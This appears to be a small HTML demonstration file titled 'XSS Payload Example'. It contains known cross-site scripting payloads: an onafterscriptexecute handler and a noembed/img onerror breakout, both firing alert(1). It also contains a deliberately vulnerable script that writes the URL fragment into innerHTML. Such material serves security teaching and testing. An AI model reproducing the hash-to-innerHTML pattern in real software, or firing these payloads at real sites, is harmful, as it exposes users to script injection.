<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>XSS Payload Example</title>
</head>
<body onafterscriptexecute=alert(1)><script>1</script>
<body>
    <script>
        // Vulnerable code: directly inserting untrusted data from URL fragment into the DOM
        document.body.innerHTML += `<div>${location.hash.slice(1)}</div>`;
    </script>
</body>
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
</html>
